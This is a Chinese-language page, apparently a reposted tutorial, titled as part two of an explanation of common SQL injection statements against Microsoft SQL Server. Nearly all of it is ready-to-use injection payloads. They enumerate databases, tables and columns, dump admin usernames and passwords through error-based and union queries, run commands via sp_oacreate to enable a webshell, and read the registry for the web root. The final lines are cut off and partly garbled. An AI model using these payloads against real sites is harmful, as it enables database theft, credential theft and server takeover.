常用SQL注射语句解析(2)

来源:互联网 时间:1970-01-01

   w "默认Web站点"

-v "e","e:/"'--

访问属性:(配合写入一个webshell)

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod

@o, 'run', NULL,' cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a

w3svc/1/ROOT/e +browse'

爆库 特殊技巧::%5c='/' 或者把/和/ 修改%5提交

如何得到SQLSERVER某个数据库中所有表的表名?

--------------------------------------------------------------------------------

用户表:

select name from sysobjects where xtype = 'U';

系统表:

select name from sysobjects where xtype = 'S';

所有表:

select name from sysobjects where xtype = 'S' or xtype = 'U';

--------------------------------------------------------------------------------

and 0<>(select top 1 paths from newtable)--

得到库名(从1到5都是系统的id,6以上才可以判断)

and 1=(select name from master.dbo.sysdatabases where dbid=7)--

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and

dbid=6)

依次提交 dbid = 7,8,9.... 得到更多的数据库名

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表

假设为 admin

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name

not in ('Admin')) 来得到其他的表。

and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and

name='admin'

and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id

and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)

得到一个admin的一个字段,假设为 user_id

and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and

name not in

('id',...)) 来暴出其他的字段

and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名

依次可以得到密码。。。。。假设存在user_id username ,password 等字段

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and

dbid=6)

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name

not in('Address'))

and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and

name='admin' and uid>(str(id))) 判断id值

and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin

(union,access也好用)
得到WEB路径
;create table [dbo].[swap] ([swappass][char](255));--

and (select top 1 swappass from swap)=1--

;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare

@test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',

@key='SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/',

@value_name='/', [email protected] OUTPUT insert into p

 

相关阅读:
Top